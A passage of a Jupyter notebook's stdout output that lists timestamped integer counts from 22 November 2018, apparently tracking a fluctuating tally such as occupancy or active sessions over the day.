"['2018-11-22 13:18:23.532458', 20]\n",
"['2018-11-22 13:18:36.190365', 19]\n",
"['2018-11-22 13:18:40.719847', 20]\n",
"['2018-11-22 13:18:45.337209', 21]\n",
"['2018-11-22 13:19:05.996559', 22]\n",
"['2018-11-22 13:19:10.879112', 23]\n",
"['2018-11-22 13:19:36.005057', 20]\n",
"['2018-11-22 13:19:42.213135', 19]\n",
"['2018-11-22 13:19:57.837629', 18]\n",
"['2018-11-22 13:20:28.177458', 19]\n",
"['2018-11-22 13:20:32.784149', 20]\n",
"['2018-11-22 13:20:41.211867', 21]\n",
"['2018-11-22 13:21:18.105616', 19]\n",
"['2018-11-22 13:21:59.056772', 20]\n",
"['2018-11-22 13:22:20.807873', 21]\n",
"['2018-11-22 13:22:23.472013', 22]\n",
"['2018-11-22 13:22:42.691643', 20]\n",
"['2018-11-22 13:22:43.091137', 19]\n",
"['2018-11-22 13:22:47.756396', 18]\n",
"['2018-11-22 13:22:49.398586', 17]\n",
"['2018-11-22 13:23:16.394190', 16]\n",
"['2018-11-22 13:24:03.133452', 14]\n",
"['2018-11-22 13:24:33.172497', 13]\n",
"['2018-11-22 13:26:09.493309', 11]\n",
"['2018-11-22 13:26:29.633775', 12]\n",
"['2018-11-22 13:26:54.392825', 9]\n",
"['2018-11-22 13:28:32.839111', 10]\n",
"['2018-11-22 13:28:38.613905', 11]\n",
"['2018-11-22 13:28:54.532126', 10]\n",
"['2018-11-22 13:29:09.551282', 9]\n",
"['2018-11-22 13:29:41.155944', 10]\n",
"['2018-11-22 13:30:45.484877', 8]\n",
"['2018-11-22 13:32:06.293182', 7]\n",
"['2018-11-22 13:32:36.315106', 6]\n",
"['2018-11-22 13:32:44.399067', 5]\n",
"['2018-11-22 13:35:05.720657', 4]\n",
"['2018-11-22 13:44:48.935896', 3]\n",
"['2018-11-22 13:49:46.499380', 4]\n",
"['2018-11-22 13:52:38.778579', 5]\n",
"['2018-11-22 13:54:07.869681', 4]\n",
"['2018-11-22 13:54:57.444464', 5]\n",
"['2018-11-22 13:55:08.715309', 6]\n",
"['2018-11-22 13:55:13.846616', 7]\n",
"['2018-11-22 13:55:52.408070', 8]\n",
"['2018-11-22 13:56:00.967121', 9]\n",
"['2018-11-22 13:56:49.874667', 10]\n",
"['2018-11-22 13:57:39.397490', 11]\n",
"['2018-11-22 13:57:58.715393', 12]\n",
"['2018-11-22 13:58:08.755117', 13]\n",
"['2018-11-22 13:58:14.478668', 12]\n",
"['2018-11-22 13:58:23.712205', 13]\n",
"['2018-11-22 13:59:26.367706', 14]\n",
"['2018-11-22 13:59:48.145578', 13]\n",
"['2018-11-22 14:00:05.081356', 14]\n",
"['2018-11-22 14:00:28.278366', 15]\n",
"['2018-11-22 14:00:56.380904', 14]\n",
"['2018-11-22 14:02:08.082988', 13]\n",
"['2018-11-22 14:02:28.866846', 12]\n",
"['2018-11-22 14:03:05.654895', 13]\n",
"['2018-11-22 14:03:26.492784', 12]\n",
"['2018-11-22 14:03:30.378175', 13]\n",
"['2018-11-22 14:03:54.820381', 14]\n",
"['2018-11-22 14:03:57.396792', 15]\n",
"['2018-11-22 14:04:01.139387', 16]\n",
"['2018-11-22 14:04:01.697971', 17]\n",
"['2018-11-22 14:04:03.796725', 18]\n",
"['2018-11-22 14:04:06.098477', 19]\n",
"['2018-11-22 14:04:06.899199', 20]\n",
"['2018-11-22 14:04:14.432417', 21]\n",
"['2018-11-22 14:04:24.156395', 20]\n",
"['2018-11-22 14:04:24.233980', 21]\n",
"['2018-11-22 14:04:35.054392', 20]\n",
"['2018-11-22 14:04:39.507315', 21]\n",
"['2018-11-22 14:04:42.107953', 22]\n",
"['2018-11-22 14:05:05.303070', 23]\n",
"['2018-11-22 14:05:32.811931', 24]\n",
"['2018-11-22 14:06:54.864815', 23]\n",
"['2018-11-22 14:07:11.932484', 22]\n",
"['2018-11-22 14:07:25.058885', 21]\n",
"['2018-11-22 14:07:26.876308', 20]\n",
"['2018-11-22 14:08:02.774936', 19]\n",
"['2018-11-22 14:08:15.106695', 18]\n",
"['2018-11-22 14:08:37.776005', 19]\n",
"['2018-11-22 14:08:45.895791', 20]\n",
"['2018-11-22 14:08:46.791676', 21]\n",
"['2018-11-22 14:08:55.774169', 20]\n",
"['2018-11-22 14:09:04.623260', 21]\n",
"['2018-11-22 14:09:39.795137', 22]\n",
"['2018-11-22 14:10:14.704259', 21]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 14:10:34.735649', 22]\n",
"['2018-11-22 14:10:44.743691', 21]\n",
"['2018-11-22 14:10:48.385817', 22]\n",
"['2018-11-22 14:10:57.320039', 21]\n",
"['2018-11-22 14:11:01.614564', 22]\n",
"['2018-11-22 14:11:04.520396', 23]\n",
"['2018-11-22 14:11:14.780776', 22]\n",
"['2018-11-22 14:11:18.902312', 21]\n",
"['2018-11-22 14:11:22.409979', 22]\n",
"['2018-11-22 14:12:09.947326', 23]\n",
"['2018-11-22 14:12:10.013968', 24]\n",
"['2018-11-22 14:12:21.070023', 25]\n",
"['2018-11-22 14:12:28.297197', 26]\n",
"['2018-11-22 14:12:47.699796', 25]\n",
"['2018-11-22 14:13:03.642550', 26]\n",
"['2018-11-22 14:13:45.538781', 25]\n",
"['2018-11-22 14:13:47.601553', 26]\n",
"['2018-11-22 14:13:49.770778', 27]\n",
"['2018-11-22 14:13:55.464528', 26]\n",
"['2018-11-22 14:14:10.361204', 27]\n",
"['2018-11-22 14:14:34.453610', 28]\n",
"['2018-11-22 14:14:40.536013', 26]\n",
"['2018-11-22 14:14:59.073165', 27]\n",
"['2018-11-22 14:15:07.874075', 26]\n",
"['2018-11-22 14:15:12.267119', 27]\n",
"['2018-11-22 14:15:27.660894', 28]\n",
"['2018-11-22 14:15:29.461514', 27]\n",
"['2018-11-22 14:15:39.641927', 26]\n",
"['2018-11-22 14:16:03.884570', 25]\n",
"['2018-11-22 14:16:31.137245', 24]\n",
"['2018-11-22 14:16:36.072257', 25]\n",
"['2018-11-22 14:16:36.828630', 26]\n",
"['2018-11-22 14:17:12.623654', 25]\n",
"['2018-11-22 14:17:14.635378', 24]\n",
"['2018-11-22 14:17:40.646627', 23]\n",
"['2018-11-22 14:17:49.264578', 22]\n",
"['2018-11-22 14:18:32.270686', 21]\n",
"['2018-11-22 14:18:54.514043', 22]\n",
"['2018-11-22 14:19:11.571513', 21]\n",
"['2018-11-22 14:19:23.812714', 20]\n",
"['2018-11-22 14:19:42.162363', 18]\n",
"['2018-11-22 14:19:51.301920', 17]\n",
"['2018-11-22 14:19:57.373954', 16]\n",
"['2018-11-22 14:20:03.451703', 14]\n",
"['2018-11-22 14:20:06.492102', 13]\n",
"['2018-11-22 14:20:07.122564', 14]\n",
"['2018-11-22 14:20:09.755715', 15]\n",
"['2018-11-22 14:20:18.753300', 14]\n",
"['2018-11-22 14:20:21.811726', 13]\n",
"['2018-11-22 14:20:25.410998', 14]\n",
"['2018-11-22 14:20:27.077820', 15]\n",
"['2018-11-22 14:20:33.840180', 16]\n",
"['2018-11-22 14:20:37.264730', 14]\n",
"['2018-11-22 14:20:41.469442', 15]\n",
"['2018-11-22 14:21:28.965043', 14]\n",
"['2018-11-22 14:22:00.943259', 15]\n",
"['2018-11-22 14:22:59.238166', 13]\n",
"['2018-11-22 14:24:44.465667', 11]\n",
"['2018-11-22 14:25:00.286062', 9]\n",
"['2018-11-22 14:25:59.263986', 8]\n",
"['2018-11-22 14:26:02.522850', 7]\n",
"['2018-11-22 14:27:04.430342', 6]\n",
"['2018-11-22 14:28:29.792757', 7]\n",
"['2018-11-22 14:29:00.100892', 8]\n",
"['2018-11-22 14:29:08.512324', 7]\n",
"['2018-11-22 14:29:14.826627', 8]\n",
"['2018-11-22 14:29:37.150274', 9]\n",
"['2018-11-22 14:30:07.187281', 8]\n",
"['2018-11-22 14:31:34.617436', 9]\n",
"['2018-11-22 14:32:10.170433', 8]\n",
"['2018-11-22 14:33:06.846593', 7]\n",
"['2018-11-22 14:33:46.446067', 6]\n",
"['2018-11-22 14:38:45.094697', 5]\n",
"['2018-11-22 14:44:53.282260', 3]\n",
"['2018-11-22 14:58:10.073635', 4]\n",
"['2018-11-22 14:58:14.333238', 5]\n",
"['2018-11-22 14:59:07.983473', 6]\n",
"['2018-11-22 14:59:57.725700', 7]\n",
"['2018-11-22 15:00:26.496390', 8]\n",
"['2018-11-22 15:01:29.731356', 9]\n",
"['2018-11-22 15:03:06.621355', 10]\n",
"['2018-11-22 15:03:39.335998', 11]\n",
"['2018-11-22 15:04:14.201245', 12]\n",
"['2018-11-22 15:04:23.803847', 13]\n",
"['2018-11-22 15:04:29.819387', 12]\n",
"['2018-11-22 15:05:01.909707', 13]\n",
"['2018-11-22 15:06:01.435003', 12]\n",
"['2018-11-22 15:06:27.408286', 13]\n",
"['2018-11-22 15:06:57.266042', 14]\n",
"['2018-11-22 15:07:23.469118', 13]\n",
"['2018-11-22 15:07:46.714281', 12]\n",
"['2018-11-22 15:08:38.412739', 9]\n",
"['2018-11-22 15:09:02.954452', 10]\n",
"['2018-11-22 15:09:33.357402', 9]\n",
"['2018-11-22 15:09:33.600651', 10]\n",
"['2018-11-22 15:09:36.173785', 11]\n",
"['2018-11-22 15:09:36.396286', 12]\n",
"['2018-11-22 15:09:41.862093', 13]\n",
"['2018-11-22 15:09:43.404434', 14]\n",
"['2018-11-22 15:10:00.218021', 15]\n",
"['2018-11-22 15:10:43.408253', 14]\n",
"['2018-11-22 15:10:44.608513', 15]\n",
"['2018-11-22 15:11:16.496913', 16]\n",
"['2018-11-22 15:12:59.190594', 17]\n",
"['2018-11-22 15:13:19.195088', 16]\n",
"['2018-11-22 15:13:39.187572', 15]\n",
"['2018-11-22 15:13:48.255766', 16]\n",
"['2018-11-22 15:14:03.428790', 17]\n",
"['2018-11-22 15:14:06.525250', 18]\n",
"['2018-11-22 15:14:35.363724', 16]\n",
"['2018-11-22 15:14:52.082977', 14]\n",
"['2018-11-22 15:14:52.143228', 15]\n",
"['2018-11-22 15:14:58.391077', 14]\n",
"['2018-11-22 15:15:05.453747', 13]\n",
"['2018-11-22 15:15:06.006455', 14]\n",
"['2018-11-22 15:15:07.957524', 13]\n",
"['2018-11-22 15:15:25.024940', 12]\n",
"['2018-11-22 15:16:01.793376', 13]\n",
"['2018-11-22 15:16:24.325092', 14]\n",
"['2018-11-22 15:16:49.078978', 15]\n",
"['2018-11-22 15:17:32.570184', 16]\n",
"['2018-11-22 15:18:32.812015', 14]\n",
"['2018-11-22 15:18:52.844768', 13]\n",
"['2018-11-22 15:18:53.427319', 12]\n",
"['2018-11-22 15:19:07.789898', 13]\n",
"['2018-11-22 15:19:29.473083', 14]\n",
"['2018-11-22 15:19:34.494055', 13]\n",
"['2018-11-22 15:19:42.361832', 12]\n",
"['2018-11-22 15:20:15.573606', 11]\n",
"['2018-11-22 15:20:24.471190', 10]\n",
"['2018-11-22 15:21:32.846760', 7]\n",
"['2018-11-22 15:22:24.916816', 8]\n",
"['2018-11-22 15:24:12.998794', 6]\n",
"['2018-11-22 15:27:11.399332', 4]\n",
"['2018-11-22 15:29:07.667125', 3]\n",
"['2018-11-22 15:46:44.083313', 4]\n",
"['2018-11-22 15:46:59.509512', 5]\n",
"['2018-11-22 15:47:01.047738', 6]\n",
"['2018-11-22 15:47:40.298445', 7]\n",
"['2018-11-22 15:48:53.266259', 8]\n",
"['2018-11-22 15:49:48.978687', 9]\n",
"['2018-11-22 15:50:09.397427', 10]\n",
"['2018-11-22 15:50:23.875748', 11]\n",
"['2018-11-22 15:50:35.608801', 10]\n",
"['2018-11-22 15:50:39.642313', 11]\n",
"['2018-11-22 15:50:41.894706', 12]\n",
"['2018-11-22 15:50:46.608442', 11]\n",
"['2018-11-22 15:51:02.381531', 9]\n",
"['2018-11-22 15:51:07.901360', 10]\n",
"['2018-11-22 15:52:18.861699', 11]\n",
"['2018-11-22 15:52:32.418487', 12]\n",
"['2018-11-22 15:53:42.500095', 13]\n",
"['2018-11-22 15:53:54.375387', 14]\n",
"['2018-11-22 15:54:16.752537', 15]\n",
"['2018-11-22 15:54:30.193927', 16]\n",
"['2018-11-22 15:54:31.295320', 17]\n",
"['2018-11-22 15:54:40.886036', 16]\n",
"['2018-11-22 15:55:24.544385', 17]\n",
"['2018-11-22 15:56:22.972433', 16]\n",
"['2018-11-22 15:56:54.608707', 15]\n",
"['2018-11-22 15:57:05.561133', 14]\n",
"['2018-11-22 15:57:11.552089', 15]\n",
"['2018-11-22 15:58:12.890616', 14]\n",
"['2018-11-22 15:58:48.988295', 13]\n",
"['2018-11-22 15:59:11.644189', 12]\n",
"['2018-11-22 15:59:13.252325', 11]\n",
"['2018-11-22 15:59:24.108544', 12]\n",
"['2018-11-22 15:59:37.205517', 13]\n",
"['2018-11-22 16:00:18.119192', 14]\n",
"['2018-11-22 16:00:22.199092', 13]\n",
"['2018-11-22 16:00:22.682023', 14]\n",
"['2018-11-22 16:00:51.856022', 15]\n",
"['2018-11-22 16:01:13.359736', 13]\n",
"['2018-11-22 16:01:14.237498', 14]\n",
"['2018-11-22 16:01:16.394529', 15]\n",
"['2018-11-22 16:01:18.303878', 16]\n",
"['2018-11-22 16:01:19.979901', 17]\n",
"['2018-11-22 16:01:20.946274', 18]\n",
"['2018-11-22 16:01:21.842713', 19]\n",
"['2018-11-22 16:01:28.685923', 20]\n",
"['2018-11-22 16:01:31.474090', 21]\n",
"['2018-11-22 16:01:41.078454', 22]\n",
"['2018-11-22 16:02:00.602791', 23]\n",
"['2018-11-22 16:02:02.964321', 24]\n",
"['2018-11-22 16:02:04.790091', 25]\n",
"['2018-11-22 16:02:36.932852', 26]\n",
"['2018-11-22 16:03:02.245320', 27]\n",
"['2018-11-22 16:03:04.595207', 28]\n",
"['2018-11-22 16:03:11.692198', 29]\n",
"['2018-11-22 16:03:43.117056', 30]\n",
"['2018-11-22 16:03:50.010911', 29]\n",
"['2018-11-22 16:04:18.846049', 28]\n",
"['2018-11-22 16:04:29.049815', 26]\n",
"['2018-11-22 16:04:47.458475', 25]\n",
"['2018-11-22 16:04:57.284946', 24]\n",
"['2018-11-22 16:05:50.946176', 21]\n",
"['2018-11-22 16:06:09.656275', 19]\n",
"['2018-11-22 16:06:25.537677', 20]\n",
"['2018-11-22 16:06:31.824478', 21]\n",
"['2018-11-22 16:07:08.078751', 19]\n",
"['2018-11-22 16:07:11.731386', 18]\n",
"['2018-11-22 16:07:18.843759', 17]\n",
"['2018-11-22 16:07:51.647732', 15]\n",
"['2018-11-22 16:08:05.942792', 13]\n",
"['2018-11-22 16:08:21.670647', 11]\n",
"['2018-11-22 16:09:06.376789', 12]\n",
"['2018-11-22 16:09:15.486500', 13]\n",
"['2018-11-22 16:10:00.830411', 14]\n",
"['2018-11-22 16:10:10.719400', 15]\n",
"['2018-11-22 16:10:31.614015', 16]\n",
"['2018-11-22 16:10:52.531398', 17]\n",
"['2018-11-22 16:11:25.851947', 16]\n",
"['2018-11-22 16:11:37.049594', 17]\n",
"['2018-11-22 16:11:49.819091', 18]\n",
"['2018-11-22 16:12:12.582355', 19]\n",
"['2018-11-22 16:12:15.216615', 20]\n",
"['2018-11-22 16:12:47.106126', 19]\n",
"['2018-11-22 16:13:27.698946', 16]\n",
"['2018-11-22 16:13:58.587273', 15]\n",
"['2018-11-22 16:14:14.327286', 16]\n",
"['2018-11-22 16:14:32.663300', 13]\n",
"['2018-11-22 16:14:35.077774', 14]\n",
"['2018-11-22 16:14:54.683141', 13]\n",
"['2018-11-22 16:16:01.908746', 11]\n",
"['2018-11-22 16:16:32.112248', 9]\n",
"['2018-11-22 16:17:23.452540', 10]\n",
"['2018-11-22 16:17:32.625752', 9]\n",
"['2018-11-22 16:17:54.812486', 8]\n",
"['2018-11-22 16:18:23.468276', 7]\n",
"['2018-11-22 16:18:29.624102', 8]\n",
"['2018-11-22 16:19:34.998383', 6]\n",
"['2018-11-22 16:22:19.552623', 7]\n",
"['2018-11-22 16:22:37.760501', 6]\n",
"['2018-11-22 16:36:41.236759', 3]\n",
"['2018-11-22 16:37:08.031721', 4]\n",
"['2018-11-22 16:38:23.547099', 5]\n",
"['2018-11-22 16:38:31.039205', 6]\n",
"['2018-11-22 16:38:54.370061', 7]\n",
"['2018-11-22 16:40:00.521381', 8]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 16:41:00.051649', 9]\n",
"['2018-11-22 16:41:43.060106', 10]\n",
"['2018-11-22 16:42:35.422358', 8]\n",
"['2018-11-22 16:44:36.868090', 7]\n",
"['2018-11-22 16:45:06.112611', 8]\n",
"['2018-11-22 16:46:25.510863', 6]\n",
"['2018-11-22 16:46:38.252916', 5]\n",
"['2018-11-22 16:47:03.585796', 6]\n",
"['2018-11-22 16:47:08.011439', 7]\n",
"['2018-11-22 16:47:52.626490', 8]\n",
"['2018-11-22 16:48:29.490194', 9]\n",
"['2018-11-22 16:48:41.491527', 10]\n",
"['2018-11-22 16:48:57.876020', 11]\n",
"['2018-11-22 16:49:15.255092', 10]\n",
"['2018-11-22 16:49:33.079153', 11]\n",
"['2018-11-22 16:49:45.056706', 12]\n",
"['2018-11-22 16:50:11.888504', 13]\n",
"['2018-11-22 16:52:57.515077', 12]\n",
"['2018-11-22 16:53:00.426848', 13]\n",
"['2018-11-22 16:53:04.389281', 14]\n",
"['2018-11-22 16:53:10.310995', 15]\n",
"['2018-11-22 16:53:16.025537', 16]\n",
"['2018-11-22 16:53:20.049538', 17]\n",
"['2018-11-22 16:53:21.738735', 18]\n",
"['2018-11-22 16:53:30.831204', 19]\n",
"['2018-11-22 16:53:40.036268', 18]\n",
"['2018-11-22 16:53:53.979439', 17]\n",
"['2018-11-22 16:53:55.096266', 18]\n",
"['2018-11-22 16:53:55.116928', 19]\n",
"['2018-11-22 16:53:59.675629', 18]\n",
"['2018-11-22 16:54:04.535440', 19]\n",
"['2018-11-22 16:54:07.656246', 20]\n",
"['2018-11-22 16:54:09.711367', 21]\n",
"['2018-11-22 16:54:09.847347', 22]\n",
"['2018-11-22 16:54:12.905864', 21]\n",
"['2018-11-22 16:54:26.352047', 22]\n",
"['2018-11-22 16:54:27.591741', 23]\n",
"['2018-11-22 16:54:42.913630', 24]\n",
"['2018-11-22 16:55:18.816152', 25]\n",
"['2018-11-22 16:56:00.039667', 24]\n",
"['2018-11-22 16:56:02.167353', 25]\n",
"['2018-11-22 16:56:08.810322', 26]\n",
"['2018-11-22 16:56:10.528383', 27]\n",
"['2018-11-22 16:56:13.665869', 28]\n",
"['2018-11-22 16:56:40.040557', 27]\n",
"['2018-11-22 16:56:55.189909', 28]\n",
"['2018-11-22 16:56:56.910898', 29]\n",
"['2018-11-22 16:56:58.431813', 30]\n",
"['2018-11-22 16:57:00.040470', 29]\n",
"['2018-11-22 16:57:03.838315', 30]\n",
"['2018-11-22 16:57:07.036077', 31]\n",
"['2018-11-22 16:57:10.668699', 30]\n",
"['2018-11-22 16:57:20.050344', 29]\n",
"['2018-11-22 16:57:25.106912', 28]\n",
"['2018-11-22 16:57:42.957609', 29]\n",
"['2018-11-22 16:57:57.736949', 27]\n",
"['2018-11-22 16:58:05.743469', 26]\n",
"['2018-11-22 16:58:10.042329', 25]\n",
"['2018-11-22 16:58:14.730868', 26]\n",
"['2018-11-22 16:58:30.536233', 27]\n",
"['2018-11-22 16:58:46.738502', 28]\n",
"['2018-11-22 16:58:59.348630', 29]\n",
"['2018-11-22 16:59:05.447633', 30]\n",
"['2018-11-22 16:59:20.045125', 28]\n",
"['2018-11-22 16:59:26.167802', 29]\n",
"['2018-11-22 17:00:39.467924', 27]\n",
"['2018-11-22 17:06:36.647467', 3]\n",
"['2018-11-22 17:06:44.842326', 4]\n",
"['2018-11-22 17:07:12.897109', 5]\n",
"['2018-11-22 17:11:13.319275', 4]\n",
"['2018-11-22 17:12:22.197228', 5]\n",
"['2018-11-22 17:13:12.635937', 6]\n",
"['2018-11-22 17:13:29.640514', 5]\n",
"['2018-11-22 17:18:23.482474', 6]\n",
"['2018-11-22 17:18:43.187693', 7]\n",
"['2018-11-22 17:24:22.185431', 3]\n",
"['2018-11-22 17:31:07.060387', 4]\n",
"['2018-11-22 17:33:33.147979', 5]\n",
"['2018-11-22 17:40:22.215720', 4]\n",
"['2018-11-22 17:41:58.315443', 5]\n",
"['2018-11-22 17:45:35.824463', 4]\n",
"['2018-11-22 17:45:48.927411', 5]\n",
"['2018-11-22 17:46:13.766904', 4]\n",
"['2018-11-22 17:47:32.662171', 5]\n",
"['2018-11-22 17:48:22.241915', 6]\n",
"['2018-11-22 17:49:14.564064', 7]\n",
"['2018-11-22 17:52:18.672169', 8]\n",
"['2018-11-22 17:53:58.112438', 7]\n",
"['2018-11-22 17:56:19.412881', 6]\n",
"['2018-11-22 17:58:01.804701', 5]\n",
"['2018-11-22 18:00:22.256091', 4]\n",
"['2018-11-22 18:02:12.406139', 5]\n",
"['2018-11-22 18:02:26.854734', 6]\n",
"['2018-11-22 18:07:35.165435', 4]\n",
"['2018-11-22 18:09:41.361021', 5]\n",
"['2018-11-22 18:12:19.118356', 4]\n",
"['2018-11-22 18:16:16.897592', 5]\n",
"['2018-11-22 18:17:54.382755', 6]\n",
"['2018-11-22 18:24:27.687483', 5]\n",
"['2018-11-22 18:25:47.684892', 3]\n",
"['2018-11-22 18:40:40.272563', 4]\n",
"['2018-11-22 18:41:18.150833', 5]\n",
"['2018-11-22 18:41:27.331073', 6]\n",
"['2018-11-22 18:42:21.504044', 7]\n",
"['2018-11-22 18:44:26.737852', 6]\n",
"['2018-11-22 18:48:32.751578', 5]\n",
"['2018-11-22 18:48:55.386055', 6]\n",
"['2018-11-22 18:48:55.463792', 7]\n",
"['2018-11-22 18:49:14.401234', 8]\n",
"['2018-11-22 18:49:15.913392', 9]\n",
"['2018-11-22 18:49:19.487164', 10]\n",
"['2018-11-22 18:49:20.211390', 11]\n",
"['2018-11-22 18:49:25.865427', 12]\n",
"['2018-11-22 18:49:34.862532', 11]\n",
"['2018-11-22 18:49:35.504174', 10]\n",
"['2018-11-22 18:49:36.441530', 11]\n",
"['2018-11-22 18:49:36.683596', 12]\n",
"['2018-11-22 18:50:15.821265', 13]\n",
"['2018-11-22 18:52:03.738017', 14]\n",
"['2018-11-22 18:52:38.005461', 13]\n",
"['2018-11-22 18:52:42.290847', 14]\n",
"['2018-11-22 18:52:42.369701', 15]\n",
"['2018-11-22 18:52:47.953851', 16]\n",
"['2018-11-22 18:52:53.531775', 17]\n",
"['2018-11-22 18:52:55.697318', 16]\n",
"['2018-11-22 18:53:10.468594', 17]\n",
"['2018-11-22 18:53:28.323526', 18]\n",
"['2018-11-22 18:53:28.333165', 19]\n",
"['2018-11-22 18:53:32.095827', 18]\n",
"['2018-11-22 18:53:37.204976', 19]\n",
"['2018-11-22 18:53:38.799721', 20]\n",
"['2018-11-22 18:53:43.248488', 21]\n",
"['2018-11-22 18:53:49.908978', 22]\n",
"['2018-11-22 18:53:53.463102', 23]\n",
"['2018-11-22 18:54:02.270191', 24]\n",
"['2018-11-22 18:54:14.082680', 25]\n",
"['2018-11-22 18:54:17.831114', 24]\n",
"['2018-11-22 18:54:23.648289', 25]\n",
"['2018-11-22 18:54:31.188981', 26]\n",
"['2018-11-22 18:54:35.388608', 27]\n",
"['2018-11-22 18:55:09.262584', 28]\n",
"['2018-11-22 18:55:48.473786', 29]\n",
"['2018-11-22 18:55:59.391602', 30]\n",
"['2018-11-22 18:56:05.180895', 29]\n",
"['2018-11-22 18:56:05.583388', 30]\n",
"['2018-11-22 18:56:08.693023', 31]\n",
"['2018-11-22 18:56:10.653305', 32]\n",
"['2018-11-22 18:56:12.684727', 33]\n",
"['2018-11-22 18:56:22.571450', 34]\n",
"['2018-11-22 18:56:44.175298', 33]\n",
"['2018-11-22 18:57:01.953557', 34]\n",
"['2018-11-22 18:57:30.154696', 33]\n",
"['2018-11-22 18:57:37.727727', 32]\n",
"['2018-11-22 18:58:06.461897', 31]\n",
"['2018-11-22 18:58:10.221963', 32]\n",
"['2018-11-22 18:58:15.298980', 30]\n",
"['2018-11-22 18:58:30.676111', 31]\n",
"['2018-11-22 18:58:34.278375', 32]\n",
"['2018-11-22 18:58:34.795304', 33]\n",
"['2018-11-22 18:58:48.315728', 34]\n",
"['2018-11-22 18:59:10.434305', 33]\n",
"['2018-11-22 18:59:22.531493', 34]\n",
"['2018-11-22 18:59:30.980404', 35]\n",
"['2018-11-22 18:59:32.836023', 34]\n",
"['2018-11-22 19:00:09.371144', 35]\n",
"['2018-11-22 19:00:11.232034', 34]\n",
"['2018-11-22 19:01:07.966649', 33]\n",
"['2018-11-22 19:01:17.979178', 32]\n",
"['2018-11-22 19:01:20.608667', 31]\n",
"['2018-11-22 19:01:35.047211', 32]\n",
"['2018-11-22 19:01:56.069328', 31]\n",
"['2018-11-22 19:02:36.780043', 29]\n",
"['2018-11-22 19:03:05.424976', 27]\n",
"['2018-11-22 19:03:12.513834', 28]\n",
"['2018-11-22 19:03:57.971224', 25]\n",
"['2018-11-22 19:04:11.153477', 21]\n",
"['2018-11-22 19:04:11.940646', 22]\n",
"['2018-11-22 19:04:25.926430', 19]\n",
"['2018-11-22 19:04:30.697051', 20]\n",
"['2018-11-22 19:04:45.879638', 19]\n",
"['2018-11-22 19:04:59.208260', 18]\n",
"['2018-11-22 19:05:25.429093', 17]\n",
"['2018-11-22 19:05:40.663136', 18]\n",
"['2018-11-22 19:06:18.078853', 19]\n",
"['2018-11-22 19:06:26.347934', 17]\n",
"['2018-11-22 19:06:46.894851', 16]\n",
"['2018-11-22 19:07:59.424426', 15]\n",
"['2018-11-22 19:08:36.883426', 13]\n",
"['2018-11-22 19:09:16.081967', 14]\n",
"['2018-11-22 19:09:29.687005', 13]\n",
"['2018-11-22 19:09:49.775786', 12]\n",
"['2018-11-22 19:09:59.598246', 13]\n",
"['2018-11-22 19:10:48.848508', 12]\n",
"['2018-11-22 19:11:02.769098', 13]\n",
"['2018-11-22 19:15:05.025554', 3]\n",
"['2018-11-22 19:28:22.858110', 4]\n",
"['2018-11-22 19:38:54.796920', 3]\n",
"['2018-11-22 19:40:55.897333', 4]\n",
"['2018-11-22 19:44:44.790284', 5]\n",
"['2018-11-22 19:45:17.045380', 6]\n",
"['2018-11-22 19:46:06.457333', 7]\n",
"['2018-11-22 19:46:39.587551', 8]\n",
"['2018-11-22 19:48:36.058986', 9]\n",
"['2018-11-22 19:48:36.516199', 10]\n",
"['2018-11-22 19:48:36.920266', 11]\n",
"['2018-11-22 19:48:41.054534', 12]\n",
"['2018-11-22 19:48:42.682897', 13]\n",
"['2018-11-22 19:48:45.507169', 12]\n",
"['2018-11-22 19:48:47.763504', 13]\n",
"['2018-11-22 19:49:00.530738', 14]\n",
"['2018-11-22 19:49:02.973164', 15]\n",
"['2018-11-22 19:49:03.053554', 14]\n",
"['2018-11-22 19:49:05.460732', 15]\n",
"['2018-11-22 19:49:09.999799', 16]\n",
"['2018-11-22 19:49:20.090846', 15]\n",
"['2018-11-22 19:49:21.801005', 16]\n",
"['2018-11-22 19:49:28.172849', 17]\n",
"['2018-11-22 19:49:36.188932', 16]\n",
"['2018-11-22 19:49:42.111728', 17]\n",
"['2018-11-22 19:49:58.534335', 18]\n",
"['2018-11-22 19:50:40.972586', 19]\n",
"['2018-11-22 19:51:14.123631', 20]\n",
"['2018-11-22 19:51:19.604021', 21]\n",
"['2018-11-22 19:51:20.390189', 22]\n",
"['2018-11-22 19:51:48.085488', 23]\n",
"['2018-11-22 19:52:24.039277', 24]\n",
"['2018-11-22 19:52:37.665631', 25]\n",
"['2018-11-22 19:53:10.109352', 26]\n",
"['2018-11-22 19:54:26.397646', 24]\n",
"['2018-11-22 19:54:32.968101', 25]\n",
"['2018-11-22 19:54:45.562277', 26]\n",
"['2018-11-22 19:55:09.585120', 27]\n",
"['2018-11-22 19:55:35.140629', 26]\n",
"['2018-11-22 19:55:56.886587', 25]\n",
"['2018-11-22 19:56:09.728496', 26]\n",
"['2018-11-22 19:56:19.309086', 27]\n",
"['2018-11-22 19:56:28.163457', 28]\n",
"['2018-11-22 19:56:36.865879', 27]\n",
"['2018-11-22 19:56:46.104272', 26]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 19:56:51.215796', 24]\n",
"['2018-11-22 19:56:59.162764', 23]\n",
"['2018-11-22 19:57:00.301000', 22]\n",
"['2018-11-22 19:57:01.016577', 23]\n",
"['2018-11-22 19:57:06.454111', 22]\n",
"['2018-11-22 19:57:09.429884', 23]\n",
"['2018-11-22 19:57:13.329475', 22]\n",
"['2018-11-22 19:57:14.342558', 23]\n",
"['2018-11-22 19:57:22.172129', 24]\n",
"['2018-11-22 19:57:39.200412', 25]\n",
"['2018-11-22 19:58:17.779712', 26]\n",
"['2018-11-22 19:58:27.459621', 25]\n",
"['2018-11-22 19:58:45.070846', 26]\n",
"['2018-11-22 19:59:08.895398', 25]\n",
"['2018-11-22 19:59:10.335758', 24]\n",
"['2018-11-22 19:59:15.978670', 25]\n",
"['2018-11-22 19:59:49.947594', 26]\n",
"['2018-11-22 20:00:12.466214', 25]\n",
"['2018-11-22 20:00:22.570327', 24]\n",
"['2018-11-22 20:00:31.715020', 25]\n",
"['2018-11-22 20:00:43.461396', 24]\n",
"['2018-11-22 20:01:18.018788', 22]\n",
"['2018-11-22 20:01:34.101388', 23]\n",
"['2018-11-22 20:01:39.172885', 24]\n",
"['2018-11-22 20:01:39.573056', 23]\n",
"['2018-11-22 20:01:58.219783', 22]\n",
"['2018-11-22 20:02:16.445072', 20]\n",
"['2018-11-22 20:02:31.728361', 21]\n",
"['2018-11-22 20:02:45.369133', 20]\n",
